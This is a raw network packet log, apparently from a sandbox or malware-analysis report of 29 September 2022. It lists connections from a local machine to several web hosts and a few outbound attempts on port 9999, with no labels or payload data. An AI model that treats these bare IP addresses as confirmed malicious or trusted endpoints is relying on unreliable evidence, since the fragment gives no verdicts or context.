                                                                                                                                                Sep 29, 2022 14:49:59.631912947 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.631930113 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.631946087 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.631969929 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.770520926 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:59.770554066 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:59.770574093 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:59.772388935 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:59.773211002 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984247923 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984312057 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984312057 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984324932 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984344959 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984364033 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984489918 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984596968 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984622955 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:49:59.984652042 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.122859001 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.122915030 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.123007059 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.124775887 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.126197100 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.274991035 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.275111914 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.275177002 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.275213003 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.275235891 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.275259972 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.275271893 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.275290966 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.275355101 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.275368929 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.284492970 CEST4977780192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:00.301935911 CEST8049777172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.302728891 CEST4977780192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:00.313585997 CEST4977780192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:00.331085920 CEST8049777172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.356935024 CEST8049777172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.413726091 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.413770914 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.413788080 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.415796041 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.419831991 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484364033 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484421968 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484421968 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484421968 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484441042 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484451056 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484468937 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484478951 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484497070 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.484524012 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:00.561484098 CEST4977180192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:00.577830076 CEST8049777172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.577965021 CEST4977780192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:00.623086929 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.623142004 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.623157024 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.625000954 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.625099897 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025367022 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025428057 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025455952 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025475979 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025496960 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025521040 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025544882 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025568962 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025682926 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.025742054 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.087352037 CEST497789999192.168.2.3190.186.45.170
                                                                                                                                                Sep 29, 2022 14:50:01.149710894 CEST4977780192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:01.164052963 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.164092064 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.164114952 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.165891886 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.165992975 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243752956 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243804932 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243804932 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243804932 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243839979 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243839979 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243868113 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243868113 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243896961 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.243896961 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.382510900 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.382564068 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.385286093 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.385381937 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.554493904 CEST497799999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:50:01.590975046 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.591028929 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.591028929 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.591029882 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.591042995 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.591061115 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.591075897 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.591092110 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.591109037 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.591129065 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:01.729648113 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.729697943 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.731559992 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:01.731817007 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016701937 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016751051 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016751051 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016762972 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016778946 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016798019 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016812086 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016825914 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016839027 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.016858101 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.155399084 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.155435085 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.157391071 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.157481909 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.366935968 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.367029905 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.367029905 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.367055893 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.367055893 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.367055893 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.367072105 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.367083073 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.367098093 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.367119074 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.505714893 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.505762100 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.507514954 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.507638931 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.757610083 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.757658958 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.757658958 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.757677078 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.757695913 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.757713079 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.757734060 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.757755041 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.757764101 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:02.896229029 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.896279097 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.896301985 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.898022890 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:02.898118973 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113019943 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113076925 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113076925 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113092899 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113104105 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113120079 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113137960 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113153934 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113172054 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.113193989 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.251765013 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.251810074 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.295464993 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.312546968 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.312791109 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652240992 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652321100 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652355909 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652380943 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652410984 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652437925 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652465105 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652498007 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652543068 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.652570963 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:03.653460979 CEST4978080192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:03.671588898 CEST8049780172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.671724081 CEST4978080192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:03.671821117 CEST4978080192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:03.689882994 CEST8049780172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.717571020 CEST8049780172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.767445087 CEST4978080192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:50:03.790841103 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.790913105 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.790935993 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.790957928 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.790978909 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.791006088 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.791027069 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.791043997 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.791063070 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.791084051 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.792782068 CEST804977254.242.4.101192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.792870998 CEST4977280192.168.2.354.242.4.101
                                                                                                                                                Sep 29, 2022 14:50:04.092597008 CEST49781443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:50:04.092653036 CEST44349781140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.092740059 CEST49781443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:50:04.093307972 CEST49781443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:50:04.093323946 CEST44349781140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.133747101 CEST44349781140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.136034012 CEST49781443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:50:04.136066914 CEST44349781140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.267357111 CEST497789999192.168.2.3190.186.45.170
                                                                                                                                                Sep 29, 2022 14:50:04.503459930 CEST44349781140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.503602982 CEST44349781140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.503679991 CEST44349781140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.503726959 CEST49781443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:50:04.505595922 CEST49781443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:50:04.624145985 CEST49781443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:50:04.625053883 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:04.625112057 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.625219107 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:04.626033068 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:04.626065016 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.664634943 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:04.767384052 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.171216965 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.171262980 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.190340042 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.192524910 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.192540884 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.192559004 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.192567110 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.192573071 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.192636013 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.192661047 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.192687988 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.192703962 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.192734957 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.195641041 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.195656061 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.195696115 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.195730925 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.195743084 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.195760012 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.195776939 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.207562923 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.207603931 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.207706928 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.207740068 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.207781076 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.210104942 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.210134029 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.210267067 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.210299015 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.211539984 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.211575031 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.211699009 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.211723089 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.211746931 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.213473082 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.213500023 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.213592052 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.213622093 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.213668108 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.222035885 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.222071886 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.222240925 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.222270966 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.223581076 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.223609924 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.223699093 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.223736048 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.223757982 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.224584103 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.224617004 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.224678040 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.224709034 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.224728107 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.226341963 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.226459980 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.265666962 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.265707016 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.265738010 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.265784979 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.265878916 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.265893936 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.265988111 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.266063929 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.289921045 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.289951086 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.289978027 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.290030956 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.290111065 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.296055079 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.296086073 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.296118021 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.296601057 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.296601057 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.311391115 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.311425924 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.311446905 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.311495066 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.311568975 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.315381050 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.315418959 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.315449953 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.315550089 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.315690041 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.319633007 CEST49782443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:50:05.319667101 CEST44349782185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:05.319691896 CEST44349782185.199.108.133192.168.2.3
